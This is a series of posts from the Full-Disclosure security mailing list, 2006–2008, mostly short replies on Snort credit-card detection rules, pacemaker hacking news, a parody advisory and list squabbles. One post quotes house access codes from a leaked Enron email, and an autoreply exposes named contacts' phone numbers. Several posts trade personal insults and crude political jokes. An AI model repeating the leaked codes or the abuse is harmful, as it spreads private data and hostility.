FYI - http://www.emergingthreats.net This was discussed on the snort-sigs mailing list back in 2003. Check out http://marc.info/?l=snort-sigsm=106601612825950w=2 Also, as Ray mentioned, the Emerging Threats emerging-policy.rules contains some PCRE CC# checks. This will show you some: $ more emerging-policy.rules | grep Number Randy On Thu, May 8, 2008 11:02 pm, Simon Smith wrote: You sure you got that URL right? Ray P wrote: The free rule sets from http://www.emergingthreats.com have this capability. Look in the Policy section. RAy From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Date: Thu, 8 May 2008 12:44:15 -0600 Subject: [Full-disclosure] Snort Signature to detect credit cards Does anyone have a snort signature to detect credit cards or social security numbers? Thank you in advance, Jeff Get Free (PRODUCT) RED Emoticons, Winks and Display Pics. Check it out! http://joinred.spaces.live.com?ocid=TXT_HMTG_prodredemoticons_052008 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Out of Office AutoReply: Snort Signature to det ect credit cards
On Fri, May 9, 2008 4:23 am, West, Bill (USA) wrote: I am no longer on-site full time and have limited access to e-mail. I will respond to you as soon as I can. If your issue is an emergency, please use the contacts below. Emergencies for MTU Users: Contact Augustin Schuster, +1-860-667-6620 Emergencies for T-Systems MTU Management: Contact Mike Bouranis, +1-248-276-3459 Thanks Folks, it is 2008. Like cell phones, e-mail autoresponders are no longer cool. Use a separate address for mailing lists (like a personal or disposable one) so we don't get bombarded with your junk. Did I mention the social engineering treasures sent around the world with each one? Do you really work in security? Gah! Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] netdev threadjack and spam and al-qaeda mi5 underground contacts secrets
On Fri, April 11, 2008 4:41 pm, n3td3v wrote: I'm an unemployed working class dude, i'm not part of the industry. Can one be unemployed and working class at the same time? If one works in security in a capacity to earn an income, would that not automatically place them in the industry? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] hacking a pacemaker
On Wed, March 12, 2008 4:57 am, Gadi Evron wrote: Almost a year ago I gave a talk at the CCC Camp in Germany I called hacking the bionic man. It even made Wired, in some fashion. http://blog.wired.com/27bstroke6/2007/08/will-the-bionic.html http://events.ccc.de/camp/2007/Fahrplan/events/2049.en.html In the talk, among other things such as the DNA and scripting languages, medical doctors and reverse engineers... was about cybernetic hacking. I gave some predictions, some for 2 years, others 40 years. Some again were pure science fiction. I was wrong on the 2 years, it's here. Today, this came up in the news (hat tip to Paul Ferguson on the funsec mailing list): http://www.nytimes.com/2008/03/12/business/12heart-web.html?_r=1oref=slogin The threat seems largely theoretical. But a team of computer security researchers plans to report Wednesday that it had been able to gain wireless access to a combination heart defibrillator and pacemaker. They were able to reprogram it to shut down and to deliver jolts of electricity that would potentially be fatal . if the device had been in a person. In this case, the researcher were hacking into a device in a laboratory. When I got my pacemaker I was working on some RF programming project. My doctor told me to find another job, he could sense my curiosity. Who could resist such fun?! Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Dude VanWinkle's Death
I always think of these pics when those precious snowflakes post nonsense: http://i118.photobucket.com/albums/o100/EMPulse_of_KC/itg_quarterly.jpg http://www.stevelambe.com/posts/Nerd.jpg http://www.encyclopediadramatica.com/images/8/88/Itg.jpg Attention whores, the lot of them. Par for the course... On Mon, February 11, 2008 2:51 pm, Geoffrey Gowey wrote: I can't even believe some of the people on this list would take this posting as a joke. This could have been any of us. Disagreeing about a persons opinion and discussing is part of being on this list, but it's something else entirely when, solely based on what they voiced on a professional mailing list about professional topics, some of the members are rejoicing. Now that is just purely tasteless and cold hearted. I guess the fact that these people who are rejoicing are the same group that hide behind anonymous mail just goes to show that keyboard bravery really can separate a person from their humanity. For those of you keyboard warriors who may disagree with some of the people here and voice your disagreement in a manner befitting a toddler I normally chalk up your nonsense to immaturity, but celebrating the death of someone who maintained his professionalism is inhuman. It has been par for the course for years to have a heavy helping of nonsense come from those who would hide their identity not for professional reasons, but for them to act out what Freud defined as their Id. This topic, however, shows these same bunch of people for what they truly are: self-serving immature cowards. I never knew really knew this person while he was alive and I am not trying to paint a picture of him as a saint, but for the immature lot on this list now would be a good time to know when to refrain from your impulse of banging out some immature posting. Show some small measure of humanity and let those affected who knew this person grieve without your antics. On Feb 11, 2008 7:40 AM, Jonathan Glass [EMAIL PROTECTED] wrote: http://www.timesreporter.com/index.php?ID=79446r=6Category=7 Justin Marcus Polazzo, 31, of Atlanta, Ga., was found dead in his home on Feb. 4, 2008. He was born in Alma, Mich., on Dec. 31, 1976. At the time of his death, Justin was employed at the Georgia Institute of Technology's Office of Information Technology in the Division of Architecture and Infrastructure. Justin is survived by his parents, mother Carol Anson Stanwyck (Doug), and father Free Polazzo (Janet), brother Chad Polazzo (Lori), and stepsister Liz Stanwyck. Other area surviving relatives are Betty Anson, Wendy (Wagner) Muzechuk, Ashley and Maggie Haverfield and James Anson (Marilyn) from Illinois. A memorial service will be held Sunday, Feb. 10, 2008, in Atlanta. It's been a sad week for the friends of Dude VanWinkle. --JG ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [FDSA] Notepad Highly CriticalCross-SiteScripting (XSS) Vulnerability
Fredrick Diggle Security Advisory Application: Notepad Versions: 5.1.2600.2180 verified to be vulnerable Platforms: Microsoft Windows (All Versions) Bugs: Cross Site Scripting (XSS) Severity: Critically High Date: 17 Jan 2008 Credit: Estr Hinan ### That’s a really funny “security risk”. I don’t agree with you, because otherwise every editor, which is able to save HTML Files, is a security problem. So vi, Dreamweaver, emacs… are all unsecure? It is your decision, to open a HTML file or not. And (if here are some MS guys) please don’t fix this “issue”, because sometimes, if you haven’t a professional tool at the moment, the Windows editor can be useful, too. Also, if you need to edit some small Scripts. Yours, SR Speaking of professional tools... Let's hope this was just a language translation error and not a fully understood response. Lighten up, folks. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Was secreview crap - now OpenVMS!!
[EMAIL PROTECTED] said: Bonus points for knowing that VMS was mostly written in Bliss/32 or some such, and VM and MVS were a mixture of assembler and (later on) PL/S. No C knowledge needed for those critters... OpenVMS is less than 40% Blissful... though I'm not familiar with the original source (wasn't it written on stone tablets?). About 50% is C, with a healthy mix of obsoletes making the difference. How something so elegant could be spawned from such chaos is beyond me. Mostly, the VMS basic OS utilities are Bliss-based (think: GNU). I really wish HP would open OpenVMS before they kill it. Security relevance: UNHACKABLE! grin Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed]QuietMove ( D - )
snip hack snip snip QuiteMove http://www.quitemove.com QuietMove snip snip hack snip A tad more attention to details would be nice. Good thing you're not graded on spelling here. C-. Happy New Year, Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security contact in att
minor float wrote: hi has anybody security contact in att? http://www.nsa.gov/contacts/index.cfm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Am I missing anything ?
http://uncyclopedia.org/wiki/Pot_v._Kettle Kradorex Xeron wrote: Simon and Joey, Your comments are not contributing anything of value to the list and is causing SNR of the list to go down. I strongly suggest for you to both take your personal banter off-list. I suspect that the rest of the list does not want to hear your personal banter toward each other. This is a security list, not a space for your personal bickering. Grow up. On Monday 23 July 2007 18:48, Simon Smith wrote: Right kid... Can we also agree that you are immature? I mean, we can't lay this to rest unless we come to a compromise. Frankly, I don't feel that it would be a compromise if you didn't come half way in this relationship. While we're at it... Lets also agree that you're a coward, probably fat and lethargic... With no real friends... Who never really gets laid? Yeah I think that about sums it up... ;] On 7/23/07 6:40 PM, Joey Mengele [EMAIL PROTECTED] wrote: No, I forgot. I now remember, thank you. As long as we agree that you were wrong, I was right, and you are an ignorant jackass who may or may not have had sexual relations with the Oreo named KF, I see no need for this thread to continue. J On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith [EMAIL PROTECTED] wrote: You are right with respect to your RFI comment... But as far as me learning anything, don't count on it. I am after all an ignorant jackass remember? SNIP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Macro threats
Muscarella, Sebastian (IT) wrote: snip NOTICE: If received in error, please destroy and notify sender. Sender does not intend to waive confidentiality or privilege. Use of this email is prohibited when received in error. 1. Shouldn't I destroy the sender *after* notifying him? 2. You may not intend to waive confidentiality or privilege, but you did. 3. You can't prohibit what I do with this email. It is mine now. Moohahaha! Seriously. These tags piss me off. There is no legal justification. It just makes the company's admins look like uneducated asses. I encourage all organizations to accept the fact that your emails are community property once you hit send. There is no e-mail Postal police nor should there be. Encrypt everything. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Cyber war on Iran
Paul Schmehl wrote: SNIP You seem to be living under the delusion that your actions can somehow influence the extremists. There's only two actions that will influence the extremists in any way and that is to kill or imprison them. Anything else you might try, like trying to make nice with them or negotiate with them, is a complete waste of time and merely hastens your own death or imprisonment. I can't believe you made a public statement about killing or imprisoning Mr. Bush. Of course, along with a few dozen of his hench(wo)men as well. Be careful, they'll send you to another country to torture you. Or is that even necessary now since he's wiped his ass with our Constitution? Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Simcard 0day.
Blue Boar wrote: dfklsddshd wrote: 1. Open attachment. Does this actually work on people on a security mailing list? BB Complete scanning result of Simcard.com, received in VirusTotal at 01.02.2007, 02:38:58 (CET). SNIP you would be quite surprised, i'm sure. randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] EEYE: Intel Network Adapter Driver Local Privilege Escalation
Josh Bressers wrote: eEye Research - http://research.eeye.com Intel Network Adapter Driver Local Privilege Escalation Release Date: December 7, 2006 Date Reported: July 10, 2006 Severity: Medium (Local Privilege Escalation to Kernel) Systems Affected: Windows 2000, XP, 2003, Vista Intel PRO 10/100 - 8.0.27.0 or previous Intel PRO/1000 - 8.7.1.0 or previous Intel PRO/1000 PCI - 9.1.30.0 or previous Linux Intel PRO 10/100 - 3.5.14 or previous Intel PRO/1000 - 7.2.7 or previous Intel PRO/10GbE- 1.0.109 or previous UnixWare/SCO6 Intel PRO 10/100 - 4.0.3 or previous Intel PRO/1000 - 9.0.15 or previous It's worth noting that this advisory is misleading. This flaw does not affect the Linux drivers. The Linux drivers do not support the NDIS API and the OID concept that Windows does. Thanks for the confirmation... I thought I had gone mad for a bit there. It just didn't sound right. The version numbers threw me off. Does anyone know how these specific Linux driver version numbers were determined? Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Enron Mail archive..... oops
Thierry Zoller wrote: Dear List , Search the Enron mail archives, for example Password : http://enron.trampolinesystems.com/search/FBI#focus=/search/password I hope this code was changed: * Aspen Security Codes Email details From: Sally Keepers To: [EMAIL PROTECTED] , [EMAIL PROTECTED] , [EMAIL PROTECTED] , [EMAIL PROTECTED] , [EMAIL PROTECTED] , [EMAIL PROTECTED] , Kenneth Lay (hide last 2) Sent: 19/09/2000 at 11:26 Email metadata Themes: The message Per Margie, the access code for the #2 house is 2001, for the #3 house it is 20011. * So many interesting emails to waste valuable time reading :-) Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [OT for crybaby list-nazis] blah blah now D.O.A.P.
William Lefkovics wrote: Tangental to this discussion is the no doubt (to be) controversial UK film D.O.A.P. soon to be screening in Toronto. http://www.e.bell.ca/filmfest/2006/media_centre/news_releaseItem.asp?id=261 It's a docu-drama of the possible ramifications following the ficticious assassination of George Bush in Chicago in 2007. Is it the London Bridge you have for sale? I'm guessing it ends with the world exploding. Because the only thing worse than the asshat we now have at the wheel here (USA) would be Cheney steering us into an iceberg. (Trivia! Cheney and I have the same cardiologist... WTF) Politics aside, I like movies that stir the pot. It could be interesting. As for the bridge... sure, L.B. works. We may have a buyer from Dallas ;-) Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: George Bush appoints a 9 year old to... blah blah blah
Paul Schmehl wrote: --On Tuesday, August 29, 2006 17:34:24 -0400 [EMAIL PROTECTED] wrote: On Tue, 29 Aug 2006 14:55:09 CDT, Paul Schmehl said: 1] Hezbollah has managed to become an important presence in the Lebanese Parliament They just left out - by killing opposition leaders and threatening others. Like your government doesn't do that too? Uhright. Wow. I have a bridge for sale... interested? Is there a library at your school? Stop by sometime. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IBM to buy ISS
Mike Owen wrote: Sounds like IBM is going to buy out ISS. Having too much experience in dealing with IBM contractors and support, I don't think this is a good thing for ISS or their customers. http://www.iss.net/about/press_center/releases/us_ibm_08233006.html You would think IBM would try and add a security company to their ranks. It is definitely something they should consider, rather than expanding their waistline with bloatware. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tempest today
[EMAIL PROTECTED] wrote: On Sat, 19 Aug 2006 18:49:09 -0500 Bipin Gautam [EMAIL PROTECTED] wrote: Ok, here is something from the book that I was trying to assemble/write. Some Links: http://www.eskimo.com/~joelm/tempest.html http://www.erikyyy.de/tempest/ Lets begin SNIP SNIP SNIP Please help make the list self-policing. Follow the list charter and note that self-promotion is forbidden. Please don't quote the entire message in your response if you have nothing useful to add. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PassMark?
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 Gary E. Miller wrote: Yo All! I thought I'd actually risk a real security question here. Any one seen the PassMark (www.passmarksecurity.com) security system in action? Yes. Bank of Bangalore^H^H^H^H^H^H^H^H^HAmerica uses it, as well as a recent financial client corp. of mine. I'm not impressed with it. Randy -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFEjjYIRrGMQdCNGUERA5rnAJ94fz+ll9VzSazzp0zfhha8BwQURQCfYch0 o6/Swjo9ZIyc4Hsb7223koo= =s8LO -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Tool Release - Tor Blocker
Jason Areff wrote: Those acronoyms prove that I know more than you apparently. Way to demonstrate your l33t hax0r skills. Jason Areff CISSP, A+, MCSE, Security+ == Better than Steven Rakick I haven't heard someone brag about an MCSE in almost a decade. The + ones are just pay to have. Even I have a CISSP. It just took people a couple years to figure out how to hack that test (aka READ a study guide). I'm sorry, but as someone with letters and crap as well, I must say I like to save them for the resume and job/contract hunting. Managers care. People that actually play in this sandbox of ours don't. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full Disclosure Code of conduct
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 Aaron Gray wrote: I am suggesting that we all cooperate and produce a Code of Conduct for participating on the Full Disclosure mailing list. Suggested start :- 1) No Swearing 2) No slagging others off 3) No selling of exploits and vulnerabilities 4) Rename it SecurityFocus FD Your number 2 is half the fun of this list. It makes people think twice before posting something senseless. Though it isn't 100% effective, it is better than having a paid moderator deleting messages. Put in a swear filter. Net Nanny or something. I do appreciate your goal, however this is a dirty and nasty arena. It was designed to be an alternative to the cleansed and censored corporate controlled lists. I must say, FD is still friendlier than the underground BBSs of the 80's 90's. Good times. Randal T. Rioux | Procyon Labs IT Security RD and Consulting Virtual: www.procyonlabs.com Physical: DC / Baltimore PGP: gpg --keyserver pgp.mit.edu --recv-keys 0xD08D1941 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFEXVkbRrGMQdCNGUERA8CxAJ95PqTgl/ybUa112N2GVzK7X/bBwACfY0wy AHCtL10wRWtNXBbCJ/amTNw= =kdaz -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE7 Zero Day
[EMAIL PROTECTED] wrote: If you are interested in bidding. I can provide you wtih an account to provide the funds. Social Security numbers are for American citizens only so don't assume I am such a person. I'll start the bidding at $1.25 USD. Do you take checks? I have a slighty used half-liter bottle of Mountain Dew for trade if you're willing to barter. Let me know... I'm serious. Randy PS I found that the rotors on my Jeep wear down faster than they should. Does anyone know a contact at Daimler/Chrylser that would be interested in buying this vulnerability information? I don't have a fix yet though. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] security at .edus
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 Brian Eaton wrote: On 4/22/06, Sol Invictus [EMAIL PROTECTED] wrote: What you don't realize is that just by posting here that an Educational Institution is vulnerable to this, Some Readers (not me) might already be scanning for web vulnerabilities at these sites across the US. I suspect the anonymous educational institution in question is hardly the only vulnerable site out there. Universities tend to be fairly decentralized places, where academic freedom can count for a lot more than a secure network. Plus a university network has fewer secrets to protect than a business. Tell that to the DoD sponsored research labs within many universities. Randy -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFESyCERrGMQdCNGUERA7iZAJ43URV3IhCRIb0b+6LDoBg5zi+dqACdFlI7 88fAbReRVK534l0ZLqlsx6U= =LrNi -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Groups e-mail disclosure in plain text
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 Rodrigo Barbosa wrote: On Wed, Apr 19, 2006 at 07:09:11AM +0100, n3td3v wrote: On 4/19/06, Randal T. Rioux [EMAIL PROTECTED] wrote: I don't think the industry needs someone to verify an advisory for them. Actually, you are wrong there. More than one company pays mine to do just that. The volume of information contained and the huge number of advisories can cost companies some big bucks. Then again, my company states pretty clear on all contracts that we will only filter and analise the advisories, not produce original ones. As for Secunia, I really can't comment. Fix your quoter. I didn't write that. n3td3v did. Randy -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFERiozRrGMQdCNGUERA+x2AJ9RBarecedPpyPtqfsnDvF4PDvPowCdFIMa ZdPQI2qL/Rugks5uc+Ru/Q0= =oedH -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Groups e-mail disclosure in plain text
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 n3td3v wrote: If they did something special with their website like Securityfocus does, then I might be able to bare their illegal footer message spam, and their scene whore republication of advisories they claim are Secunia exclusives. What does SF offer? Stale news and constant subliminal ads for Symantec products? Google ads *vomit*? An abysmal mailing list moderated by a cat sleeping on the delete button? I don't care what is on Secunia's site or what they do. They let everyone bitch, fight and we're better with it than without. You're here. You must get something out of it to stay. I hate the Bush regime - but I'm not moving to Canada! Randy -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD4DBQFERc8aRrGMQdCNGUERA2T6AJiVsdDNOo6RoiXK2h3fVetaDV2OAJ0Wzjvs U8xptEQR+Fr0+WyQZ+I8HA== =mY8c -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Noise
No. He needs to disconnect from AOL because his sister needs the phone and his mom just yelled to him in the basement to come up for dinner. php0t wrote: You need a hug. -Original Message- *From:* [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] *On Behalf Of *n3td3v *Sent:* Thursday, March 30, 2006 12:57 AM *To:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] Noise I finished school 11 years ago, infact I left on my own accordance (when I was 14) because they were going to chuck me out of school anyway. I soon got involved in stealing cars, brekaing into houses, and taking goods from shops. All my criminal friends went to jail, I was the only one left. I started using computers to pass the time (when I was 18) when having no one left to hang about with, and I used my knowledge of criminality to work out the bad guys at Yahoo. I then met an employee (who will remain unnamed) to act as an informant for Yahoo. I then started to find my own vulnerabilities to Yahoo, which I reported to them. They started disrespecting me, I setup my own security group to show them that I could be a match against them and continue to compromise their systems. I then went on a public crusade to tell the public all about their flaws that I had been keeping secret for years. Their employees who thought were befriending me to keep in tap with info I had were told finally to f*** off just last week, and now there is no connection between n3td3v and the yahoo security team, infact, I mailed the official address and told them I wouldn't be mailign them ever again. And thats the current situation, upto date. Seiden at yahoo (security consultant/advisor/hacker) whatever you want to call him is now pissed off because he's getting no info feed into his corporate security team anymore... and the consultants and engineers who had opened dialog with me are now sitting in paranoia. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 Gadi Evron wrote: snip.cut.hack of security attitude I wonder why anybody believes OpenBSD is the most secure OS around. No - that would be OpenVMS duck! :-) At least until HP kills it. Randy. still wondering what is 'open' about VMS -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFEJkoXRrGMQdCNGUERAxXeAJsGwsgHx3bIQPpQVA5rM+PEEZMn1QCff4qk fgjq68/XYJXXmvVg7n84R6I= =pIi8 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: SURROUNDED / SF Symantec
-BEGIN PGP SIGNED MESSAGE- Hash: RIPEMD160 Javor Ninov wrote: do you realize that your so-called popularity is based on the fact that FD is not moderated ? strange .. i don't see you on securityfocus.com n3td3v wrote: No THINK required, IS BIG, FACT. Not to defend the mighty 'd3v, but securityfocus.com, aka Symantec, is trash. They delete any posting to any of their owned lists that say even the slightest bad thing about any of their weak products. Despite the trolls, FD is the last great pasture of free security discussion. The securityfocus lists are for clueless management types looking to pick up buzzwords for their next big useless presentation to the CEOs. Randy -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFEIBKnRrGMQdCNGUERA23sAJ4xpl/9YwH/5eM+XR3KwmxT2givmwCdFYRd pSmkEoRaD5eWtY9ZFRm4nGg= =FpR4 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Reported Google Vuln
Dave Korn wrote: nodialtone wrote: Google funzies. [Snip] Reference: http://seclists.org/lists/fulldisclosure/2006/Feb/0553.html Ok, I give up. Why are you posting a report to the full-disclosure list to announce a post that was posted to... the full-disclosure list? Is this some kind of mail-loop joke? cheers, DaveK my head just exploded. guts hurt from laughing. thanks dave. the dreaded fibonacci vulnerability!! it gets worse with each posting! ahh! time for sleep... randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/